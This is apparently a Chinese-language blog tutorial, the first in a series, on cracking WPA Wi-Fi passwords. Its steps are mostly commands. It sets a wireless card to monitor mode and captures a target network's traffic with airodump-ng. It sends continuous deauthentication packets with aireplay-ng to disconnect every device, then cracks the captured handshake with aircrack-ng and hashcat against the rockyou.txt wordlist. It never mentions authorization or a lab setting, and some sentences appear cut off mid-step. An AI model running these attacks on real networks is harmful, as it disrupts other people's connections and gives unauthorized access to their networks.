接下來4天會有比較不一樣的內容分享!
今天分享的無線網路破解需要有"監控模式"的網卡才能進行喔!
ifconfig 查看系統中的網絡接口。wl 開頭,例如 wlo1)。iwconfig 確認無線網卡的名稱及當前模式。 
ifconfig [interface] down 關閉無線網卡(例如 ifconfig wlo1 down)。iwconfig [interface] mode monitor 將無線網卡設置為監聽模式(例如 iwconfig wlo1 mode monitor)。ifconfig [interface] up 重新啟動無線網卡(例如 ifconfig wlo1 up)。iwconfig 確認無線網卡是否成功切換至監聽模式。 
airmon-ng check wlo1 來檢查可能干擾攻擊的進程。airmon-ng check kill 來終止這些進程,避免干擾。 
airodump-ng wlo1 開始捕獲周圍所有無線接入點的信息。Ctrl+C 停止捕獲,並記住目標Wi-Fi的CH(Channel)和MAC地址(BSSID)。 
輸入以下命令針對特定目標Wi-Fi進行數據捕獲:
airodump-ng -c [CH] --bssid [MAC地址] -w [文件名] wlo1
這將專注於捕獲指定Wi-Fi的數據,包括握手數據。
aireplay-ng -0 0 -a [MAC地址] wlo1 來持續發送Deauthentication數據包,將所有設備從目標Wi-Fi斷開。(只需要執行幾秒就可以ctrl+C中斷).cap 擴展名的文件,其內含四向握手數據。.cap 文件中。rockyou.txt。locate rockyou.txt 找到該文件的位置,一般位於 /usr/share/wordlists/rockyou.txt.gz。rockyou.txt.gz 文件複製到桌面,然後使用 gzip -d rockyou.txt.gz 解壓縮文件。 
cat rockyou.txt 或 nano rockyou.txt 查看和編輯解壓縮後的 rockyou.txt 文件。在終端中輸入以下命令開始破解:
aircrack-ng -w rockyou.txt [你的 .cap 文件名]
命令中的 w 參數指定密碼列表文件,隨後是包含握手數據的 .cap 文件。
該命令將開始測試密碼列表中的每個密碼,並嘗試與 .cap 文件中的握手數據匹配。
 
hashcat 或 hashcat --help 來查看幫助菜單,了解 Hashcat 的使用方法和可用選項。2500。 
.cap 文件轉換為 Hashcat 支持的格式
.cap 文件轉換為 .hccapx 格式。.cap 文件轉換為 .hccapx 文件,然後下載該文件並保存到桌面。
使用以下命令構建 Hashcat 的破解命令:
hashcat -a 0 -m 2500 [你的 .hccapx 文件名] [你的 rockyou.txt 字典文件]
其中:
a 0 指定使用簡單模式(也就是低級攻擊模式)。m 2500 指定要破解的哈希類型為 WPA EAPOL PBKDF2。[你的 .hccapx 文件名] 是之前轉換後的 .hccapx 文件。[你的 rockyou.txt 字典文件] 是我們使用的密碼字典文件。 
S 鍵查看當前的破解進度。